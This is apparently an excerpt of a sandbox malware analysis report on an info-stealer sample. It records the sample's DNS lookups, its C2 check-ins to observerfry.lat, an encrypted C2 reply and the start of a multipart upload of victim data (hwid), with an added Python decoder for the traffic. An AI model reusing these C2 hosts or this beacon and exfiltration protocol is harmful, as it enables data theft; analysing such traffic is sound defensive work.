                                                                                                                                              Dec 24, 2024 08:51:05.804692984 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.804721117 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.804739952 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.805588961 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.805659056 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:05.806130886 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:05.970324039 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:06.004858971 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:06.222743988 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:06.222768068 CET4434975816.15.177.52192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:06.222781897 CET49758443192.168.2.716.15.177.52
                                                                                                                                              Dec 24, 2024 08:51:06.222788095 CET4434975816.15.177.52192.168.2.7
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 24, 2024 08:50:35.302262068 CET  56592        53         192.168.2.7    1.1.1.1
Dec 24, 2024 08:50:35.521568060 CET  53           56592      1.1.1.1        192.168.2.7
Dec 24, 2024 08:50:58.777879000 CET  51507        53         192.168.2.7    1.1.1.1
Dec 24, 2024 08:50:58.914823055 CET  53           51507      1.1.1.1        192.168.2.7
Dec 24, 2024 08:51:01.194436073 CET  54011        53         192.168.2.7    1.1.1.1
Dec 24, 2024 08:51:01.519340038 CET  53           54011      1.1.1.1        192.168.2.7
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                            Type            Class        DNS over HTTPS
Dec 24, 2024 08:50:35.302262068 CET  192.168.2.7  1.1.1.1  0x46e4    Standard query (0)  observerfry.lat                 A (IP address)  IN (0x0001)  false
Dec 24, 2024 08:50:58.777879000 CET  192.168.2.7  1.1.1.1  0x690c    Standard query (0)  bitbucket.org                   A (IP address)  IN (0x0001)  false
Dec 24, 2024 08:51:01.194436073 CET  192.168.2.7  1.1.1.1  0x7547    Standard query (0)  bbuseruploads.s3.amazonaws.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                            CName                         Address         Type                    Class        DNS over HTTPS
Dec 24, 2024 08:50:35.521568060 CET  1.1.1.1    192.168.2.7  0x46e4    No error (0)  observerfry.lat                 -                             172.67.199.72   A (IP address)          IN (0x0001)  false
Dec 24, 2024 08:50:35.521568060 CET  1.1.1.1    192.168.2.7  0x46e4    No error (0)  observerfry.lat                 -                             104.21.36.201   A (IP address)          IN (0x0001)  false
Dec 24, 2024 08:50:58.914823055 CET  1.1.1.1    192.168.2.7  0x690c    No error (0)  bitbucket.org                   -                             185.166.143.48  A (IP address)          IN (0x0001)  false
Dec 24, 2024 08:50:58.914823055 CET  1.1.1.1    192.168.2.7  0x690c    No error (0)  bitbucket.org                   -                             185.166.143.49  A (IP address)          IN (0x0001)  false
Dec 24, 2024 08:50:58.914823055 CET  1.1.1.1    192.168.2.7  0x690c    No error (0)  bitbucket.org                   -                             185.166.143.50  A (IP address)          IN (0x0001)  false
Dec 24, 2024 08:51:01.519340038 CET  1.1.1.1    192.168.2.7  0x7547    No error (0)  bbuseruploads.s3.amazonaws.com  s3-1-w.amazonaws.com          -               CNAME (Canonical name)  IN (0x0001)  false
Dec 24, 2024 08:51:01.519340038 CET  1.1.1.1    192.168.2.7  0x7547    No error (0)  s3-1-w.amazonaws.com            s3-w.us-east-1.amazonaws.com  -               CNAME (Canonical name)  IN (0x0001)  false
Dec 24, 2024 08:51:01.519340038 CET  1.1.1.1    192.168.2.7  0x7547    No error (0)  s3-w.us-east-1.amazonaws.com    -                             16.15.177.52    A (IP address)          IN (0x0001)  false
Dec 24, 2024 08:51:01.519340038 CET  1.1.1.1    192.168.2.7  0x7547    No error (0)  s3-w.us-east-1.amazonaws.com    -                             52.217.43.44    A (IP address)          IN (0x0001)  false
Dec 24, 2024 08:51:01.519340038 CET  1.1.1.1    192.168.2.7  0x7547    No error (0)  s3-w.us-east-1.amazonaws.com    -                             3.5.29.254      A (IP address)          IN (0x0001)  false
Dec 24, 2024 08:51:01.519340038 CET  1.1.1.1    192.168.2.7  0x7547    No error (0)  s3-w.us-east-1.amazonaws.com    -                             16.15.178.13    A (IP address)          IN (0x0001)  false
Dec 24, 2024 08:51:01.519340038 CET  1.1.1.1    192.168.2.7  0x7547    No error (0)  s3-w.us-east-1.amazonaws.com    -                             52.217.132.121  A (IP address)          IN (0x0001)  false
Dec 24, 2024 08:51:01.519340038 CET  1.1.1.1    192.168.2.7  0x7547    No error (0)  s3-w.us-east-1.amazonaws.com    -                             3.5.16.126      A (IP address)          IN (0x0001)  false
Dec 24, 2024 08:51:01.519340038 CET  1.1.1.1    192.168.2.7  0x7547    No error (0)  s3-w.us-east-1.amazonaws.com    -                             54.231.168.185  A (IP address)          IN (0x0001)  false
Dec 24, 2024 08:51:01.519340038 CET  1.1.1.1    192.168.2.7  0x7547    No error (0)  s3-w.us-east-1.amazonaws.com    -                             54.231.167.17   A (IP address)          IN (0x0001)  false
                                                                                                                                              • observerfry.lat
                                                                                                                                              • bitbucket.org
                                                                                                                                              • bbuseruploads.s3.amazonaws.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
0           192.168.2.7  49700        172.67.199.72   443               424  C:\Users\user\Desktop\tTGxYWtjG5.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-24 07:50:37 UTC  262                OUT        POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: observerfry.lat
2024-12-24 07:50:37 UTC  8                  OUT        Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-12-24 07:50:37 UTC  1124               IN         HTTP/1.1 200 OK
  Date: Tue, 24 Dec 2024 07:50:37 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=2v96525mj3c9t7abjo39huqjc3; expires=Sat, 19 Apr 2025 01:37:16 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gsZdz05P0Aq%2BjTU8XvSCs7s8BSRRZamw3iQiWeGNMGEhSR17L%2FpeRmD9rxSUu8Y7zoMjTb7FZDqSDAIOX1AMow5mPbyghesiR3viBNJzm6f9dNQq9hz3xAQK8VItcoG%2B6XQ%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f6f0062fd0c8c93-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1767&rtt_var=673&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1615044&cwnd=192&unsent_bytes=0&cid=8dcff7ebc62e4349&ts=1118&x=0"
2024-12-24 07:50:37 UTC  7                  IN         Data Raw: 32 0d 0a 6f 6b 0d 0a
  Data Ascii: 2ok
2024-12-24 07:50:37 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0
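
Worked example (added here by the editor; it is not part of the Joe Sandbox report and not code from the sample): a small Python decoder for the check-in traffic recorded in these two HTTPS sessions. It parses the form-encoded POST bodies (act=life, and act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=), reassembles a chunked response from the "Data Raw" hex dumps (the "2ok" above is the chunk "2\r\nok\r\n"), and refuses to return a partial body when the capture is cut short, which is how the long recive_message reply appears in this report. The labels "beacon" and "config_request", and the reading of "lid" as a build identifier, are this example's assumptions, not something the report states.

```python
"""Decode and classify the LummaC check-in traffic captured above.

Added example; not part of the Joe Sandbox report or of the sample.
The sample inputs below are constructed from the sessions on this page.
The labels "beacon"/"config_request" and the reading of "lid" as a build
identifier are this example's assumptions.
"""
from typing import Optional
from urllib.parse import parse_qs

# Constructed from the captured sessions on this page.
BEACON_BODY = "act=life"
CONFIG_BODY = "act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j="
BEACON_REPLY_RAW = [
    "Data Raw: 32 0d 0a 6f 6b 0d 0a",   # chunk: "2\r\nok\r\n"
    "Data Raw: 30 0d 0a 0d 0a",         # terminator: "0\r\n\r\n"
]
# First bytes of the recive_message reply: a chunk of 0x46d bytes is
# announced but the hex dump stops long before that, i.e. truncated.
TRUNCATED_REPLY_RAW = [
    "Data Raw: 34 36 64 0d 0a 71 67 68 39 2b 65 61 66 42 41 49 30 35 64",
]


def hexdump_to_bytes(raw_line: str) -> bytes:
    """Turn one 'Data Raw: 32 0d 0a ...' line into bytes."""
    return bytes.fromhex(raw_line.split("Data Raw:", 1)[-1])


def dechunk(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer-encoded body.

    Layout is '<hex size>[;ext]\\r\\n<data>\\r\\n' repeated, ending with a
    zero-size chunk. Raises ValueError on a truncated or malformed body
    rather than silently returning partial data.
    """
    out = bytearray()
    pos = 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("truncated chunk-size line")
        size = int(body[pos:end].split(b";", 1)[0], 16)  # drop chunk extensions
        pos = end + 2
        if size == 0:
            return bytes(out)
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk data")
        out += chunk
        pos += size + 2


def reassemble_reply(raw_lines: list) -> Optional[bytes]:
    """Join the 'Data Raw' lines of one response and de-chunk them.

    Returns None when the capture is incomplete, so a caller never mistakes
    a partial C2 reply for the whole message.
    """
    body = b"".join(hexdump_to_bytes(line) for line in raw_lines)
    try:
        return dechunk(body)
    except ValueError:
        return None


def classify_checkin(form_body: str) -> dict:
    """Parse a POST /api body and label the 'act' command.

    Assumed meanings, derived only from the two bodies on this page:
    'life' is a liveness beacon; 'recive_message' asks the panel for the
    encrypted task/config blob and carries the protocol version ('ver')
    and what this example assumes is a build identifier ('lid').
    """
    fields = {k: v[0] for k, v in parse_qs(form_body, keep_blank_values=True).items()}
    act = fields.get("act", "")
    labels = {"life": "beacon", "recive_message": "config_request"}
    return {
        "act": act,
        "label": labels.get(act, "unknown"),
        "ver": fields.get("ver"),
        "lid": fields.get("lid"),
        "lumma_checkin": act in labels,
    }


if __name__ == "__main__":
    print(classify_checkin(BEACON_BODY))
    print(reassemble_reply(BEACON_REPLY_RAW))      # b'ok'
    print(classify_checkin(CONFIG_BODY))
    print(reassemble_reply(TRUNCATED_REPLY_RAW))   # None: capture cut short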


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
1           192.168.2.7  49701        172.67.199.72   443               424  C:\Users\user\Desktop\tTGxYWtjG5.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-24 07:50:39 UTC  263                OUT        POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 53
  Host: observerfry.lat
2024-12-24 07:50:39 UTC  53                 OUT        Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
  Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-24 07:50:39 UTC  1123               IN         HTTP/1.1 200 OK
  Date: Tue, 24 Dec 2024 07:50:39 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=jma5h9ahoimjvmpe936ncf8giq; expires=Sat, 19 Apr 2025 01:37:18 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xVjZd9kxegqZT5oeBPW4hl2IdIDo5jEiOrYJTyOk79lANhPW9ySGth6LTjeiqB1nbmaq81%2FvCanzNwn4Q7WmU1guywvYsr%2Fef%2BkoG7moaP02xUJaphwyAEgqTNWYxPmlAKc%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f6f00702b6e8c17-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1769&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1586956&cwnd=240&unsent_bytes=0&cid=df44fcb5a15e3f75&ts=778&x=0"
2024-12-24 07:50:39 UTC  246                IN         Data Raw: 34 36 64 0d 0a 71 67 68 39 2b 65 61 66 42 41 49 30 35 64 2f 64 53 2f 74 35 72 2b 50 57 34 75 6f 54 64 56 50 72 6f 4b 66 56 51 4d 62 78 53 34 33 52 4b 67 76 62 33 4b 73 6f 49 45 65 41 2f 65 63 2f 69 51 7a 4b 7a 2f 53 44 6a 6a 46 50 4e 59 72 4d 31 4c 42 73 35 49 63 6d 72 35 42 75 48 4a 57 56 2b 69 67 67 55 5a 33 39 35 78 43 41 57 38 71 4e 39 4e 6a 49 64 68 38 78 69 73 7a 46 74 43 75 70 67 53 66 75 77 6d 51 61 6b 59 50 38 59 47 4e 59 69 4c 71 34 4c 70 6f 54 77 59 71 37 69 6f 63 78 57 58 47 4f 32 6f 58 76 59 6f 75 55 50 2b 7a 6e 61 51 36 53 78 4f 49 6f 65 52 61 41 73 66 39 78 32 52 6a 4b 67 62 71 45 6a 6e 67 64 4f 34 50 45 78 4c 45 71 74 70 67 74 35 63 4a 71 47 5a 43 4a 39 58 52 75 55 6f 2b 78 76 69 53 61 57 34 50 42 73 35 6a 49 4b
  Data Ascii: 46dqgh9+eafBAI05d/dS/t5r+PW4uoTdVProKfVQMbxS43RKgvb3KsoIEeA/ec/iQzKz/SDjjFPNYrM1LBs5Icmr5BuHJWV+iggUZ395xCAW8qN9NjIdh8xiszFtCupgSfuwmQakYP8YGNYiLq4LpoTwYq7iocxWXGO2oXvYouUP+znaQ6SxOIoeRaAsf9x2RjKgbqEjngdO4PExLEqtpgt5cJqGZCJ9XRuUo+xviSaW4PBs5jIK
2024-12-24 07:50:39 UTC  894                IN         Data Raw: 56 64 69 75 38 48 55 70 6a 65 70 67 79 2b 76 31 79 51 47 32 34 50 78 4a 6a 67 57 6a 37 47 78 4c 4a 6f 55 79 6f 43 30 6b 6f 64 78 46 44 6d 42 78 73 2b 34 4c 61 75 64 49 2b 6a 41 59 78 69 55 67 2f 56 67 62 31 58 48 38 2f 38 75 67 56 75 56 77 5a 53 51 69 33 49 44 50 4a 69 43 32 76 6b 37 35 4a 51 6c 72 35 41 71 47 5a 57 46 38 47 5a 79 58 6f 79 32 75 6a 75 53 45 73 43 4d 74 49 32 43 66 68 51 78 6a 73 6a 50 75 43 69 67 6e 69 54 70 79 47 70 66 31 63 54 36 66 69 41 4f 78 35 36 36 4f 5a 34 58 32 38 4f 4f 77 4a 63 2f 44 6e 47 4f 7a 6f 58 76 59 71 79 57 4b 75 7a 44 5a 52 79 54 6a 2b 39 6d 63 6c 43 4b 75 4b 30 76 6e 42 58 48 67 71 61 4b 68 6e 63 55 4f 49 4c 4c 77 4c 41 6d 35 4e 31 70 36 4e 41 71 52 39 75 6c 38 47 31 73 58 4a 43 39 2f 7a 62 58 41 6f 32 47 75 4d 44 51
  Data Ascii: Vdiu8HUpjepgy+v1yQG24PxJjgWj7GxLJoUyoC0kodxFDmBxs+4LaudI+jAYxiUg/Vgb1XH8/8ugVuVwZSQi3IDPJiC2vk75JQlr5AqGZWF8GZyXoy2ujuSEsCMtI2CfhQxjsjPuCigniTpyGpf1cT6fiAOx566OZ4X28OOwJc/DnGOzoXvYqyWKuzDZRyTj+9mclCKuK0vnBXHgqaKhncUOILLwLAm5N1p6NAqR9ul8G1sXJC9/zbXAo2GuMDQ
2024-12-24 07:50:39 UTC  1369               IN         Data Raw: 34 34 61 66 0d 0a 6f 65 65 4d 51 68 2f 6b 49 4c 43 75 32 4c 38 30 79 62 67 78 32 49 66 6d 6f 44 77 59 6d 46 62 69 37 53 38 4a 5a 55 54 77 49 32 77 6a 34 42 35 46 44 6d 62 7a 4d 75 78 4a 4b 53 57 61 61 47 49 62 51 66 62 33 4c 31 43 62 6b 47 54 74 76 30 63 6d 68 58 44 68 71 4c 41 6c 7a 38 4f 63 59 37 4f 68 65 39 69 71 70 34 69 34 38 39 6a 48 70 69 45 39 32 68 76 58 49 2b 31 76 79 53 59 45 4d 57 48 75 59 75 48 66 68 41 35 69 73 37 41 75 69 48 6b 33 57 6e 6f 30 43 70 48 32 36 48 7a 5a 58 46 48 78 59 69 38 4a 35 63 63 32 38 47 72 7a 70 45 78 45 44 33 4a 6d 6f 57 39 4a 61 4f 58 4a 4f 58 4c 62 68 75 57 69 2f 52 76 61 55 53 4e 73 62 45 37 6c 42 48 49 6a 37 69 46 68 33 45 57 4d 49 66 49 7a 76 64 73 35 4a 51 78 72 35 41 71 4d 4a 61 55 37 32 78 72 52 38 57 49 76 43
  Data Ascii: 44afoeeMQh/kILCu2L80ybgx2IfmoDwYmFbi7S8JZUTwI2wj4B5FDmbzMuxJKSWaaGIbQfb3L1CbkGTtv0cmhXDhqLAlz8OcY7Ohe9iqp4i489jHpiE92hvXI+1vySYEMWHuYuHfhA5is7AuiHk3Wno0CpH26HzZXFHxYi8J5cc28GrzpExED3JmoW9JaOXJOXLbhuWi/RvaUSNsbE7lBHIj7iFh3EWMIfIzvds5JQxr5AqMJaU72xrR8WIvC
2024-12-24 07:50:39 UTC  1369               IN         Data Raw: 77 5a 75 44 6e 6e 74 58 4c 73 66 62 68 62 41 75 35 4d 74 70 35 63 52 75 48 4a 65 4e 38 57 74 68 55 6f 43 77 75 79 6d 66 48 63 69 41 76 34 69 45 66 68 30 39 6a 63 37 4d 73 53 36 6e 6b 43 2b 76 68 69 6f 59 67 38 53 6c 4a 6b 46 62 6a 4c 47 2f 4b 6f 67 63 6a 63 2f 30 6a 6f 35 78 56 32 6d 66 30 74 4b 77 50 65 71 4b 61 65 6a 45 4b 6b 66 62 6a 75 39 6a 62 6c 4b 4e 75 4c 73 6c 6b 78 76 49 6b 37 79 47 6a 33 30 66 4e 49 62 45 77 4c 6f 6c 72 35 41 37 2f 63 74 75 45 5a 66 45 73 79 5a 6e 54 73 66 6c 2f 77 79 4f 47 4e 32 48 74 38 43 58 50 77 35 78 6a 73 36 46 37 32 4b 6b 6e 53 58 6b 7a 32 45 55 6e 34 44 39 61 32 74 59 69 62 53 7a 49 5a 55 63 33 34 79 78 69 49 4a 34 45 6a 32 45 77 64 65 30 49 2b 54 64 61 65 6a 51 4b 6b 66 62 6f 38 35 52 51 78 61 59 38 36 5a 70 6e 68 65
  Data Ascii: wZuDnntXLsfbhbAu5Mtp5cRuHJeN8WthUoCwuymfHciAv4iEfh09jc7MsS6nkC+vhioYg8SlJkFbjLG/Kogcjc/0jo5xV2mf0tKwPeqKaejEKkfbju9jblKNuLslkxvIk7yGj30fNIbEwLolr5A7/ctuEZfEsyZnTsfl/wyOGN2Ht8CXPw5xjs6F72KknSXkz2EUn4D9a2tYibSzIZUc34yxiIJ4Ej2Ewde0I+TdaejQKkfbo85RQxaY86Zpnhe
2024-12-24 07:50:39 UTC  1369               IN         Data Raw: 49 74 2b 48 48 47 57 6a 4e 7a 33 4a 61 6a 54 63 61 2f 50 59 68 65 56 68 2f 74 74 62 46 71 47 74 4c 6b 73 6b 52 7a 43 68 72 32 48 69 48 63 46 4e 6f 54 4c 78 62 77 72 72 70 63 6f 35 49 67 6b 58 35 79 63 76 54 34 67 5a 49 43 72 72 79 72 5a 42 49 4f 59 39 49 65 45 4d 55 39 78 68 4e 44 45 73 6a 43 67 6e 43 4c 39 77 32 77 66 6e 70 62 36 61 6d 70 5a 68 4c 57 79 4b 70 45 4a 7a 59 79 30 6b 70 70 33 48 44 2f 4a 6a 49 57 77 4f 75 54 4c 61 64 37 66 59 56 2b 45 79 75 51 6d 5a 31 72 48 35 66 38 71 6b 78 62 44 6b 37 43 47 67 33 49 5a 4f 59 7a 4b 77 62 30 76 71 35 67 6a 35 73 42 71 45 4a 36 4d 39 6d 42 75 56 34 47 78 73 6d 6e 58 57 38 71 5a 39 4e 6a 49 56 67 30 38 6a 39 58 55 67 69 57 6b 77 6d 6e 77 68 6e 4e 66 6e 49 69 39 50 69 42 62 69 37 65 79 4c 4a 30 54 79 6f 4b 31
  Data Ascii: It+HHGWjNz3JajTca/PYheVh/ttbFqGtLkskRzChr2HiHcFNoTLxbwrrpco5IgkX5ycvT4gZICrryrZBIOY9IeEMU9xhNDEsjCgnCL9w2wfnpb6ampZhLWyKpEJzYy0kpp3HD/JjIWwOuTLad7fYV+EyuQmZ1rH5f8qkxbDk7CGg3IZOYzKwb0vq5gj5sBqEJ6M9mBuV4GxsmnXW8qZ9NjIVg08j9XUgiWkwmnwhnNfnIi9PiBbi7eyLJ0TyoK1
                                                                                                                                              2024-12-24 07:50:39 UTC1369INData Raw: 41 39 79 5a 71 46 75 53 2b 69 6b 69 6a 6e 77 47 6f 5a 6b 59 44 2b 62 32 4e 52 6a 72 75 30 4b 70 4d 55 79 6f 65 77 67 49 4e 32 47 54 65 4d 79 63 7a 33 62 4f 53 55 4d 61 2b 51 4b 6a 6d 34 6c 75 39 55 62 6c 57 63 2f 61 42 6e 67 46 76 4b 6a 66 54 59 79 48 6f 66 50 70 76 48 7a 4c 38 6d 72 5a 4d 74 35 63 56 74 48 35 36 4a 2b 47 4a 75 55 6f 43 39 73 79 61 65 45 38 4b 46 74 49 2f 49 50 31 63 32 6b 59 4b 64 39 77 4b 76 68 51 6a 68 77 33 68 66 68 4d 72 6b 4a 6d 64 61 78 2b 58 2f 4a 35 41 61 78 59 2b 34 69 49 78 6a 46 7a 71 41 7a 63 53 34 49 71 65 53 49 2b 66 61 62 42 2b 51 6a 50 70 75 5a 46 69 56 76 4c 42 70 31 31 76 4b 6d 66 54 59 79 45 41 42 4e 6f 37 4e 68 35 34 6c 76 35 49 6a 37 4d 4e 6d 58 34 54 4b 35 43 5a 6e 57 73 66 6c 2f 79 53 56 46 73 6d 54 75 49 43 49 65
                                                                                                                                              Data Ascii: A9yZqFuS+ikijnwGoZkYD+b2NRjru0KpMUyoewgIN2GTeMycz3bOSUMa+QKjm4lu9UblWc/aBngFvKjfTYyHofPpvHzL8mrZMt5cVtH56J+GJuUoC9syaeE8KFtI/IP1c2kYKd9wKvhQjhw3hfhMrkJmdax+X/J5AaxY+4iIxjFzqAzcS4IqeSI+fabB+QjPpuZFiVvLBp11vKmfTYyEABNo7Nh54lv5Ij7MNmX4TK5CZnWsfl/ySVFsmTuICIe
                                                                                                                                              2024-12-24 07:50:39 UTC1369INData Raw: 4a 79 37 49 6a 71 4a 6b 75 34 64 70 72 46 5a 65 46 2b 6d 46 72 52 49 79 76 74 43 47 61 46 63 57 49 74 49 36 49 63 42 6f 78 79 59 79 46 73 44 72 6b 79 32 6e 4b 36 33 30 4a 6b 63 62 65 63 58 5a 63 67 4c 47 70 49 70 67 59 32 34 79 6b 77 4d 59 78 42 6a 61 59 67 70 32 68 4d 72 4f 55 4e 71 48 52 4b 68 69 58 78 4b 55 6d 61 31 6d 4a 73 4c 51 74 6b 42 37 46 67 72 47 46 67 6e 30 62 4d 49 48 4c 7a 37 49 6e 6f 70 6b 71 34 63 64 72 45 35 2b 4e 38 32 38 67 47 4d 65 36 70 32 6e 42 57 2f 75 52 73 35 69 46 59 56 55 44 69 74 50 55 6f 69 2b 30 6c 57 76 41 79 32 59 63 6e 6f 50 74 4a 6e 38 59 6e 76 32 34 4a 64 6c 44 6a 59 47 77 6a 49 74 32 47 54 36 45 7a 63 4b 38 4c 61 36 64 4f 2b 44 4e 59 68 4f 54 69 65 39 73 61 6b 53 4f 74 4c 49 6e 6b 51 6e 4f 77 66 72 41 6a 32 6c 58 61 63
                                                                                                                                              Data Ascii: Jy7IjqJku4dprFZeF+mFrRIyvtCGaFcWItI6IcBoxyYyFsDrky2nK630JkcbecXZcgLGpIpgY24ykwMYxBjaYgp2hMrOUNqHRKhiXxKUma1mJsLQtkB7FgrGFgn0bMIHLz7Inopkq4cdrE5+N828gGMe6p2nBW/uRs5iFYVUDitPUoi+0lWvAy2YcnoPtJn8Ynv24JdlDjYGwjIt2GT6EzcK8La6dO+DNYhOTie9sakSOtLInkQnOwfrAj2lXac
                                                                                                                                              2024-12-24 07:50:39 UTC1369INData Raw: 45 37 4b 65 4f 65 7a 4e 62 53 47 6c 69 76 70 79 5a 31 69 42 76 66 39 6e 32 52 53 4e 32 59 33 41 77 44 45 6f 66 38 6e 61 68 65 39 69 6b 5a 41 6e 34 63 39 38 44 74 61 6e 36 6e 42 71 54 63 57 62 75 44 69 51 44 63 43 54 39 4d 37 49 64 31 64 70 32 59 79 46 73 7a 50 6b 79 33 6d 39 6b 7a 39 4d 7a 4e 53 76 65 53 35 50 78 36 76 2f 63 63 74 56 6a 5a 50 30 32 4d 67 32 46 43 4f 62 78 4d 61 68 49 65 4f 74 46 38 2f 44 66 42 36 57 6a 2f 46 59 58 6b 4f 45 73 37 45 75 6a 77 71 4e 7a 2f 53 50 79 43 6b 75 63 63 47 43 2b 76 6c 69 76 4e 4e 78 72 2f 31 70 45 5a 57 44 36 33 63 74 64 6f 79 72 76 69 53 53 46 34 2b 41 75 5a 43 50 4d 56 6c 78 6a 34 4b 64 35 32 7a 6b 6c 7a 69 76 6b 44 70 4e 77 4e 47 75 4d 54 41 45 6d 50 4f 6d 61 59 39 62 6c 64 50 36 77 4a 6f 78 54 33 48 4f 77 64 65
                                                                                                                                              Data Ascii: E7KeOezNbSGlivpyZ1iBvf9n2RSN2Y3AwDEof8nahe9ikZAn4c98Dtan6nBqTcWbuDiQDcCT9M7Id1dp2YyFszPky3m9kz9MzNSveS5Px6v/cctVjZP02Mg2FCObxMahIeOtF8/DfB6Wj/FYXkOEs7EujwqNz/SPyCkuccGC+vlivNNxr/1pEZWD63ctdoyrviSSF4+AuZCPMVlxj4Kd52zklzivkDpNwNGuMTAEmPOmaY9bldP6wJoxT3HOwde
                                                                                                                                              2024-12-24 07:50:39 UTC1369INData Raw: 69 72 76 77 79 70 52 32 34 4b 39 50 6a 49 59 78 37 6d 75 61 63 46 4c 6e 39 72 68 30 39 38 68 52 53 37 48 32 34 57 68 59 76 7a 42 5a 36 2f 61 4b 6b 66 62 77 2f 35 30 63 6c 43 45 71 37 78 75 70 79 58 72 67 72 4f 47 69 33 38 41 49 4d 76 74 78 72 77 75 71 4a 51 2f 30 66 5a 2f 48 4a 57 4b 2b 6e 42 78 46 73 6e 39 73 47 6e 42 49 6f 32 51 76 6f 66 45 4f 56 73 67 6d 73 7a 4f 6f 53 58 6b 72 47 65 76 30 43 70 48 32 37 48 2b 61 47 35 52 6b 61 7a 79 44 35 6f 63 79 34 4b 36 6c 35 6b 78 57 58 47 50 67 70 33 6c 62 4f 53 58 4f 4b 2b 51 4f 6b 33 41 30 61 34 78 4d 41 53 59 38 36 5a 70 6a 31 75 56 30 76 72 41 6d 6a 46 50 63 63 37 4d 79 4c 59 68 71 70 41 37 2f 63 35 70 43 5a 6a 44 77 31 68 46 57 34 71 34 73 53 36 6e 4a 65 79 4c 70 49 32 48 64 69 6b 50 76 74 50 43 70 32 43 43
                                                                                                                                              Data Ascii: irvwypR24K9PjIYx7muacFLn9rh098hRS7H24WhYvzBZ6/aKkfbw/50clCEq7xupyXrgrOGi38AIMvtxrwuqJQ/0fZ/HJWK+nBxFsn9sGnBIo2QvofEOVsgmszOoSXkrGev0CpH27H+aG5RkazyD5ocy4K6l5kxWXGPgp3lbOSXOK+QOk3A0a4xMASY86Zpj1uV0vrAmjFPcc7MyLYhqpA7/c5pCZjDw1hFW4q4sS6nJeyLpI2HdikPvtPCp2CC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49703 | 172.67.199.72 | 443 | 424 | C:\Users\user\Desktop\tTGxYWtjG5.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 07:50:41 UTC | 274 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=XGZGWN69Z4L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12808
Host: observerfry.lat
2024-12-24 07:50:41 UTC | 12808 | OUT | Data Ascii:
--XGZGWN69Z4L
Content-Disposition: form-data; name="hwid"

